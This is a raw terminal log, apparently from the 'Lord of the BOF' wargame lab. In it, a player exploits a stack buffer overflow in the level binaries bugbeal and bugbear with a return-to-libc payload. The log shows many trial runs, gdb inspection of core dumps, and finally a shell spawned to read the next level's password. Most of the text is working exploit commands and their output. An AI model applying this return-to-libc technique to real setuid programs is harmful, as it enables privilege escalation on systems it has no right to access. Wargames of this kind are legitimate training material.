0xbffffcbf:	 "LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01"...
0xbffffd87:	 ";32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;3"...
0xbffffe4f:	 "5:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:"
0xbffffe82:	 "MACHTYPE=i386-redhat-linux-gnu"
0xbffffea1:	 "MAIL=/var/spool/mail/darkknight"
0xbffffec1:	 "INPUTRC=/etc/inputrc"
0xbffffed6:	 "BASH_ENV=/home/darkknight/.bashrc"
0xbffffef8:	 "LANG=en_US"
0xbfffff03:	 "DISPLAY=192.168.235.1:0.0"
0xbfffff1d:	 "LOGNAME=darkknight"
0xbfffff30:	 "SHLVL=2"
0xbfffff38:	 "USERNAME="
0xbfffff42:	 "SHELL=/bin/bash"
0xbfffff52:	 "HOSTTYPE=i386"
0xbfffff60:	 "HISTSIZE=1000"
0xbfffff6e:	 "OSTYPE=linux-gnu"
0xbfffff7f:	 "TERM=xterm"
0xbfffff8a:	 "HOME=/home/darkknight"
0xbfffffa0:	 "PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/darkknight/bin"
0xbfffffe6:	 "_=./bugbeal"
0xbffffff2:	 "./bugbeal"
0xbffffffc:	 ""
0xbffffffd:	 ""
0xbffffffe:	 ""
0xbfffffff:	 ""
0xc0000000:	 <Address 0xc0000000 out of bounds>
0xc0000000:	 <Address 0xc0000000 out of bounds>
0xc0000000:	 <Address 0xc0000000 out of bounds>
0xc0000000:	 <Address 0xc0000000 out of bounds>
0xc0000000:	 <Address 0xc0000000 out of bounds>
0xc0000000:	 <Address 0xc0000000 out of bounds>
0xc0000000:	 <Address 0xc0000000 out of bounds>
0xc0000000:	 <Address 0xc0000000 out of bounds>
0xc0000000:	 <Address 0xc0000000 out of bounds>
(gdb) q
[darkknight@localhost darkknight]$ ;
bash2: syntax error near unexpected token `;'
[darkknight@localhost darkknight]$ ./bugbeal `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x39\xfc\xff\xbf"'` `python -c 'print "ABABABABABABABABA"+"bin/sh\x00"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA9
sh: bin/sh: No such file or directory
Segmentation fault (core dumped)
[darkknight@localhost darkknight]$ ./bugbeal `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x39\xfc\xff\xbf"'` `python -c 'print "ABABABABABABABABA"+"/bin/sh\x00"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA9
sh: bin/sh: No such file or directory
Segmentation fault (core dumped)
[darkknight@localhost darkknight]$ Xshell
bash2: Xshell: command not found
[darkknight@localhost darkknight]$ ./bugbeal `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x39\xfc\xff\xbf"'` `python -c 'print "ABABABABABABABABA"+"bashsh\x00"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA9
sh: bashsh: command not found
Segmentation fault (core dumped)
[darkknight@localhost darkknight]$ ./bugbeal `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x39\xfc\xff\xbf"'` `python -c 'print "ABABABABABABABABA"+"bash\x00"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA9
sh: BAbash: command not found
Segmentation fault (core dumped)
[darkknight@localhost darkknight]$ ./bugbeal `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x39\xfc\xff\xbf"'` `python -c 'print "ABABABABABABABABA"+"bash2\x00"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA9
sh: Abash2: command not found
Segmentation fault (core dumped)
[darkknight@localhost darkknight]$ ./bugbeal `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x39\xfc\xff\xbf"'` `python -c 'print "ABABABABABABABABA"+"//bash2\x00"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA9
sh: /bash2: No such file or directory
Segmentation fault (core dumped)
[darkknight@localhost darkknight]$ ./bugbeal `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x39\xfc\xff\xbf"'` `python -c 'print "ABABABABABABABABA"+"//bash2\x00"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA9
sh: /bash2: No such file or directory
Segmentation fault (core dumped)
[darkknight@localhost darkknight]$ ./bugbeal `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x39\xfc\xff\xbf"'` `python -c 'print "ABABABABABABABABA"+"/bash2\x00"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA9
sh: /bash2: No such file or directory
Segmentation fault (core dumped)
[darkknight@localhost darkknight]$ ./bugbeal `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x39\xfc\xff\xbf"'` `python -c 'print "ABABABABABABABABA"+"/bin/bash2\x00"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA9
sh: /bash2: No such file or directory
Segmentation fault (core dumped)
[darkknight@localhost darkknight]$ ./bugbeal `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x39\xfc\xff\xbf"'` `python -c 'print "ABABABABABABABABA"+"/bin/bash2\x00"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA9
sh: /bash2: No such file or directory
Segmentation fault (core dumped)
[darkknight@localhost darkknight]$ ./bugbeal `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x39\xfc\xff\xbf"'` `python -c 'print "ABABABABABABABABA"+"/bin/bash2"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA9
sh: /bash2: No such file or directory
Segmentation fault (core dumped)
[darkknight@localhost darkknight]$ ./bugbeal `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x39\xfc\xff\xbf"'` `python -c 'print "ABABABABABABABABA"+"./bash2"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA9
sh: /bash2: No such file or directory
Segmentation fault (core dumped)
[darkknight@localhost darkknight]$ ./bugbeal `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x39\xfc\xff\xbf"'` `python -c 'print "ABABABABABABABABA"+"../bash2"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA9
sh: /bash2: No such file or directory
Segmentation fault (core dumped)
[darkknight@localhost darkknight]$ Xshell
bash2: Xshell: command not found
[darkknight@localhost darkknight]$ 
[darkknight@localhost darkknight]$ ./bugbeal `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x39\xfc\xff\xbf"'` `python -c 'print "ABABABABABABABABA"+"/./bash2"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA9
sh: /bash2: No such file or directory
Segmentation fault (core dumped)
[darkknight@localhost darkknight]$ ./bugbeal `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x39\xfc\xff\xbf"'` `python -c 'print "ABABABABABABABABA"+"/bin/ls"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA9
sh: bin/ls: No such file or directory
Segmentation fault (core dumped)
[darkknight@localhost darkknight]$ ./bugbeal `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x39\xfc\xff\xbf"'` `python -c 'print "ABABABABABABABABA"+"/bin/ls"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA9
sh: bin/ls: No such file or directory
Segmentation fault (core dumped)
[darkknight@localhost darkknight]$ ./bugbeal `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x39\xfc\xff\xbf"'` `python -c 'print "ABABABABABABABABA"+"//bin/ls"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA9
sh: bin/ls: No such file or directory
Segmentation fault (core dumped)
[darkknight@localhost darkknight]$ ./bugbeal `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x39\xfc\xff\xbf"'` `python -c 'print "ABABABABABABABABA"+"///bin/ls"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA9
sh: bin/ls: No such file or directory
Segmentation fault (core dumped)
[darkknight@localhost darkknight]$ ./bugbeal `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x39\xfc\xff\xbf"'` `python -c 'print "ABABABABABABABABA"+"/\//bin/ls"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA9
sh: bin/ls: No such file or directory
Segmentation fault (core dumped)
[darkknight@localhost darkknight]$ ./bugbeal `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x39\xfc\xff\xbf"'` `python -c 'print "ABABABABABABABABA"+"\/bin/ls"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA9
sh: bin/ls: No such file or directory
Segmentation fault (core dumped)
[darkknight@localhost darkknight]$ Xshellexit
bash2: Xshellexit: command not found
[darkknight@localhost darkknight]$ exit
exit
There are stopped jobs.
[darkknight@localhost darkknight]$ exit
exit
[darkknight@localhost darkknight]$ exit
logout
Connection closing...Socket close.

Connection closed by foreign host.

Disconnected from remote host(LOB) at 05:32:28.

Type `help' to learn how to use Xshell prompt.
[c:\~]$ 















































Xshell 5 (Build 1339)
Copyright (c) 2002-2017 NetSarang Computer, Inc. All rights reserved.

Type `help' to learn how to use Xshell prompt.
[c:\~]$ 

Connecting to 192.168.235.128:23...
Connection established.
To escape to local shell, press 'Ctrl+Alt+]'.
                                            _______________________
  _______________________-------------------                       `\
 /:--__                                                              |
||< > |                                   ___________________________/
| \__/_________________-------------------                         |
|                                                                  |
 |        The Lord of the BOF : The Fellowship of the BOF, 2010    |
 |                                                                  |
 |                                                                  |
  |       [enter to the dungeon]                                    |
  |       gate : gate                                                |
  |                                                                  |
  |       [RULE]                                                     |
   |      - do not use local root exploit                             |
   |      - do not use LD_PRELOAD to my-pass                          |
   |      - do not use single boot                    [h4ck3rsch001] |
  |                                              ____________________|_
  |  ___________________-------------------------                      `\
  |/`--_                                                                 |
  ||[ ]||                                            ___________________/
   \===/___________________-------------------------- 


login: darkknight 
Password: 
Last login: Tue May 22 02:22:53 from 192.168.235.1
[darkknight@localhost darkknight]$ ls
bugbeal  bugbear  bugbear.c  core  test  test.c
[darkknight@localhost darkknight]$ bin/sh
bash: bin/sh: No such file or directory
[darkknight@localhost darkknight]$ /bin/sh
bash$ exit
exit
[darkknight@localhost darkknight]$ ./bugbeal `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x39\xfc\xff\xbf"'` `python -c 'print "ABABABABABABABAB"+"/bin/sh\x00"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA9
Segmentation fault (core dumped)
[darkknight@localhost darkknight]$ gdb -q -c core 
Core was generated by `./bugbeal AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA9ABABABABAB'.
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
(gdb) x/2- $esp  
0x4000051c:	Cannot access memory at address 0x4000051c
(gdb) x/20 $esp
0xbffffae4:	0xbf00fc39	0xbffffb38	0x40013868	0x00000004
0xbffffaf4:	0x08048380	0x00000000	0x080483a1	0x08048430
0xbffffb04:	0x00000004	0xbffffb24	0x080482e0	0x080484dc
0xbffffb14:	0x4000ae60	0xbffffb1c	0x40013e90	0x00000004
0xbffffb24:	0xbffffc1d	0xbffffc27	0xbffffc5e	0xbffffc60
(gdb) 
0xbffffb34:	0x00000000	0xbffffc78	0xbffffc9a	0xbffffca4
0xbffffb44:	0xbffffcb2	0xbffffcd1	0xbffffce4	0xbffffcfd
0xbffffb54:	0xbffffd1d	0xbffffd28	0xbffffd36	0xbffffd7c
0xbffffb64:	0xbffffd92	0xbffffda7	0xbffffdb7	0xbffffdc7
0xbffffb74:	0xbffffde9	0xbffffe03	0xbffffe0e	0xbffffe1b
(gdb) 
0xbffffb84:	0xbffffe23	0xbfffffe6	0x00000000	0x00000003
0xbffffb94:	0x08048034	0x00000004	0x00000020	0x00000005
0xbffffba4:	0x00000006	0x00000006	0x00001000	0x00000007
0xbffffbb4:	0x40000000	0x00000008	0x00000000	0x00000009
0xbffffbc4:	0x08048380	0x0000000b	0x00000200	0x0000000c
(gdb) 
0xbffffbd4:	0x00000200	0x0000000d	0x00000200	0x0000000e
0xbffffbe4:	0x00000200	0x00000010	0x0fabfbff	0x0000000f
0xbffffbf4:	0xbffffc18	0x00000000	0x00000000	0x00000000
0xbffffc04:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc14:	0x00000000	0x36383669	0x622f2e00	0x65626775
(gdb) exit
Undefined command: "exit".  Try "help".
(gdb) q 
[darkknight@localhost darkknight]$ bash 2
2: 2: No such file or directory
[darkknight@localhost darkknight]$ bash2
[darkknight@localhost darkknight]$ ./bugbeal `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x39\xfc\xff\xbf"'` `python -c 'print "ABABABABABABABAB"+"/bin/sh\x00"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA9
sh: bin/sh: No such file or directory
Segmentation fault (core dumped)
[darkknight@localhost darkknight]$ gdb -q -c core 
Core was generated by `./bugbeal AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA9ABABABABAB'.
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
(gdb) x/20 $esp  
0xbffffaa4:	0xbffffc39	0xbffffa00	0x40013868	0x00000003
0xbffffab4:	0x08048380	0x00000000	0x080483a1	0x08048430
0xbffffac4:	0x00000003	0xbffffae4	0x080482e0	0x080484dc
0xbffffad4:	0x4000ae60	0xbffffadc	0x40013e90	0x00000003
0xbffffae4:	0xbffffbe5	0xbffffbef	0xbffffc28	0x00000000
(gdb) 
0xbffffaf4:	0xbffffc40	0xbffffc55	0xbffffc6e	0xbffffc8d
0xbffffb04:	0xbffffcaf	0xbffffcbf	0xbffffe82	0xbffffea1
0xbffffb14:	0xbffffec1	0xbffffed6	0xbffffef8	0xbfffff03
0xbffffb24:	0xbfffff1d	0xbfffff30	0xbfffff38	0xbfffff42
0xbffffb34:	0xbfffff52	0xbfffff60	0xbfffff6e	0xbfffff7f
(gdb) 
0xbffffb44:	0xbfffff8a	0xbfffffa0	0xbfffffe6	0x00000000
0xbffffb54:	0x00000003	0x08048034	0x00000004	0x00000020
0xbffffb64:	0x00000005	0x00000006	0x00000006	0x00001000
0xbffffb74:	0x00000007	0x40000000	0x00000008	0x00000000
0xbffffb84:	0x00000009	0x08048380	0x0000000b	0x00000200
(gdb) 
0xbffffb94:	0x0000000c	0x00000200	0x0000000d	0x00000200
0xbffffba4:	0x0000000e	0x00000200	0x00000010	0x0fabfbff
0xbffffbb4:	0x0000000f	0xbffffbe0	0x00000000	0x00000000
0xbffffbc4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbd4:	0x00000000	0x00000000	0x00000000	0x36383669
(gdb) 
0xbffffbe4:	0x622f2e00	0x65626775	0x41006c61	0x41414141
0xbffffbf4:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc04:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc14:	0x41414141	0xe0414141	0x4140058a	0x39414141
0xbffffc24:	0x00bffffc	0x42414241	0x42414241	0x42414241
(gdb) 
0xbffffc34:	0x42414241	0x6e69622f	0x0068732f	0x3d445750
0xbffffc44:	0x6d6f682f	0x61642f65	0x6e6b6b72	0x74686769
0xbffffc54:	0x4d455200	0x4845544f	0x3d54534f	0x2e323931
0xbffffc64:	0x2e383631	0x2e353332	0x4f480031	0x414e5453
0xbffffc74:	0x6c3d454d	0x6c61636f	0x74736f68	0x636f6c2e
(gdb) x/20 $esp-1
0xbffffaa3:	0xfffc3941	0xfffa00bf	0x013868bf	0x00000340
0xbffffab3:	0x04838000	0x00000008	0x0483a100	0x04843008
0xbffffac3:	0x00000308	0xfffae400	0x0482e0bf	0x0484dc08
0xbffffad3:	0x00ae6008	0xfffadc40	0x013e90bf	0x00000340
0xbffffae3:	0xfffbe500	0xfffbefbf	0xfffc28bf	0x000000bf
(gdb) 
0xbffffaf3:	0xfffc4000	0xfffc55bf	0xfffc6ebf	0xfffc8dbf
0xbffffb03:	0xfffcafbf	0xfffcbfbf	0xfffe82bf	0xfffea1bf
0xbffffb13:	0xfffec1bf	0xfffed6bf	0xfffef8bf	0xffff03bf
0xbffffb23:	0xffff1dbf	0xffff30bf	0xffff38bf	0xffff42bf
0xbffffb33:	0xffff52bf	0xffff60bf	0xffff6ebf	0xffff7fbf
(gdb) 
0xbffffb43:	0xffff8abf	0xffffa0bf	0xffffe6bf	0x000000bf
0xbffffb53:	0x00000300	0x04803400	0x00000408	0x00002000
0xbffffb63:	0x00000500	0x00000600	0x00000600	0x00100000
0xbffffb73:	0x00000700	0x00000000	0x00000840	0x00000000
0xbffffb83:	0x00000900	0x04838000	0x00000b08	0x00020000
(gdb) 
0xbffffb93:	0x00000c00	0x00020000	0x00000d00	0x00020000
0xbffffba3:	0x00000e00	0x00020000	0x00001000	0xabfbff00
0xbffffbb3:	0x00000f0f	0xfffbe000	0x000000bf	0x00000000
0xbffffbc3:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbd3:	0x00000000	0x00000000	0x00000000	0x38366900
(gdb) 
0xbffffbe3:	0x2f2e0036	0x62677562	0x006c6165	0x41414141
0xbffffbf3:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc03:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc13:	0x41414141	0x41414141	0x40058ae0	0x41414141
0xbffffc23:	0xbffffc39	0x41424100	0x41424142	0x41424142
(gdb) 
0xbffffc33:	0x41424142	0x69622f42	0x68732f6e	0x44575000
0xbffffc43:	0x6f682f3d	0x642f656d	0x6b6b7261	0x6867696e
0xbffffc53:	0x45520074	0x45544f4d	0x54534f48	0x3239313d
0xbffffc63:	0x3836312e	0x3533322e	0x4800312e	0x4e54534f
0xbffffc73:	0x3d454d41	0x61636f6c	0x736f686c	0x6f6c2e74
(gdb) x/20s $esp-1
0xbffffaa3:	 "A9
0xbffffaa9:	 "\001@\003"
0xbffffab2:	 ""
0xbffffab3:	 ""
0xbffffab4:	 "\200\203\004\b"
0xbffffab9:	 ""
0xbffffaba:	 ""
0xbffffabb:	 ""
0xbffffabc:	 "¡\203\004\b0\204\004\b\003"
0xbffffac6:	 ""
0xbffffac7:	 ""
0xbffffac8:	 "廿¿02\004\bۜ204\004\b`®"
0xbffffad7:	 "@ݺÿ¿\220>\001@\003"
0xbffffae2:	 ""
0xbffffae3:	 ""
0xbffffae4:	 "漿¿༿¿(
0xbffffaf1:	 ""
0xbffffaf2:	 ""
0xbffffaf3:	 ""
0xbffffaf4:	 "@潿¿n갱5ཿ¿¿갰2þÿ¿¡þÿ¿¾ÿ¿׾ÿ¿ﾜ003ÿÿ¿\035ÿÿ¿0ÿÿ¿8ÿÿ¿Bÿÿ¿Rÿÿ¿`ÿÿ¿nÿÿ¿\177ÿÿ¿\212ÿÿ¿ ÿÿ¿耿¿"
(gdb) 
0xbffffb51:	 ""
0xbffffb52:	 ""
0xbffffb53:	 ""
0xbffffb54:	 "\003"
0xbffffb56:	 ""
0xbffffb57:	 ""
0xbffffb58:	 "4\200\004\b\004"
0xbffffb5e:	 ""
0xbffffb5f:	 ""
0xbffffb60:	 " "
0xbffffb62:	 ""
0xbffffb63:	 ""
0xbffffb64:	 "\005"
0xbffffb66:	 ""
0xbffffb67:	 ""
0xbffffb68:	 "\006"
0xbffffb6a:	 ""
0xbffffb6b:	 ""
0xbffffb6c:	 "\006"
0xbffffb6e:	 ""
(gdb) 
0xbffffb6f:	 ""
0xbffffb70:	 ""
0xbffffb71:	 "\020"
0xbffffb73:	 ""
0xbffffb74:	 "\a"
0xbffffb76:	 ""
0xbffffb77:	 ""
0xbffffb78:	 ""
0xbffffb79:	 ""
0xbffffb7a:	 ""
0xbffffb7b:	 "@\b"
0xbffffb7e:	 ""
0xbffffb7f:	 ""
0xbffffb80:	 ""
0xbffffb81:	 ""
0xbffffb82:	 ""
0xbffffb83:	 ""
0xbffffb84:	 "\t"
0xbffffb86:	 ""
0xbffffb87:	 ""
(gdb) 
0xbffffb88:	 "\200\203\004\b\013"
0xbffffb8e:	 ""
0xbffffb8f:	 ""
0xbffffb90:	 ""
0xbffffb91:	 "\002"
0xbffffb93:	 ""
0xbffffb94:	 "\f"
0xbffffb96:	 ""
0xbffffb97:	 ""
0xbffffb98:	 ""
0xbffffb99:	 "\002"
0xbffffb9b:	 ""
0xbffffb9c:	 "\r"
0xbffffb9e:	 ""
0xbffffb9f:	 ""
0xbffffba0:	 ""
0xbffffba1:	 "\002"
0xbffffba3:	 ""
0xbffffba4:	 "\016"
0xbffffba6:	 ""
(gdb) 
0xbffffba7:	 ""
0xbffffba8:	 ""
0xbffffba9:	 "\002"
0xbffffbab:	 ""
0xbffffbac:	 "\020"
0xbffffbae:	 ""
0xbffffbaf:	 ""
0xbffffbb0:	 "ÿꮱ7\017"
0xbffffbb6:	 ""
0xbffffbb7:	 ""
0xbffffbb8:	 "Ἷ¿"
0xbffffbbd:	 ""
0xbffffbbe:	 ""
0xbffffbbf:	 ""
0xbffffbc0:	 ""
0xbffffbc1:	 ""
0xbffffbc2:	 ""
0xbffffbc3:	 ""
0xbffffbc4:	 ""
0xbffffbc5:	 ""
(gdb) 
0xbffffbc6:	 ""
0xbffffbc7:	 ""
0xbffffbc8:	 ""
0xbffffbc9:	 ""
0xbffffbca:	 ""
0xbffffbcb:	 ""
0xbffffbcc:	 ""
0xbffffbcd:	 ""
0xbffffbce:	 ""
0xbffffbcf:	 ""
0xbffffbd0:	 ""
0xbffffbd1:	 ""
0xbffffbd2:	 ""
0xbffffbd3:	 ""
0xbffffbd4:	 ""
0xbffffbd5:	 ""
0xbffffbd6:	 ""
0xbffffbd7:	 ""
0xbffffbd8:	 ""
0xbffffbd9:	 ""
(gdb) 
0xbffffbda:	 ""
0xbffffbdb:	 ""
0xbffffbdc:	 ""
0xbffffbdd:	 ""
0xbffffbde:	 ""
0xbffffbdf:	 ""
0xbffffbe0:	 "i686"
0xbffffbe5:	 "./bugbeal"
0xbffffbef:	 'A' <repeats 44 times>, "12\005@AAAA9
0xbffffc28:	 "ABABABABABABABAB/bin/sh"
0xbffffc40:	 "PWD=/home/darkknight"
0xbffffc55:	 "REMOTEHOST=192.168.235.1"
0xbffffc6e:	 "HOSTNAME=localhost.localdomain"
0xbffffc8d:	 "LESSOPEN=|/usr/bin/lesspipe.sh %s"
0xbffffcaf:	 "USER=darkknight"
0xbffffcbf:	 "LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01"...
0xbffffd87:	 ";32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;3"...
0xbffffe4f:	 "5:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:"
0xbffffe82:	 "MACHTYPE=i386-redhat-linux-gnu"
0xbffffea1:	 "MAIL=/var/spool/mail/darkknight"
(gdb) q
[darkknight@localhost darkknight]$ ./bugbeal `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x38\xfc\xff\xbf"'` `python -c 'print "ABABABABABABABAB"+"/bin/sh\x00"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA8
bash$ exit  
exit
Segmentation fault (core dumped)
[darkknight@localhost darkknight]$ ./bugbear `python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"AAAA"+"\x38\xfc\xff\xbf"'` `python -c 'print "ABABABABABABABAB"+"/bin/sh\x00"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAɀAAAA8
bash$ my-pass
euid = 513
new divide
bash$ my-pass
euid = 513
new divide
bash$ my-pass
euid = 513
new divide
bash$ my-pass
euid = 513
new divide
bash$ my-pass
euid = 513
new divide
bash$ my-pass
euid = 513
new divide
bash$ my-pass
euid = 513
new divide
bash$ my-pass
euid = 513
new divide
bash$ my-pass
euid = 513
new divide
bash$ my-pass
euid = 513
new divide
bash$ my-pass
euid = 513
new divide
bash$ my-pass
euid = 513
new divide
bash$ my-pass
euid = 513
new divide
bash$ my-pass
euid = 513
new divide
bash$ my-pass
euid = 513
new divide
bash$ exit
exit
Segmentation fault
[darkknight@localhost darkknight]$ exit
exit
[darkknight@localhost darkknight]$ exit
logout
Connection closing...Socket close.

Connection closed by foreign host.

Disconnected from remote host(LOB) at 13:30:32.

Type `help' to learn how to use Xshell prompt.
[c:\~]$ 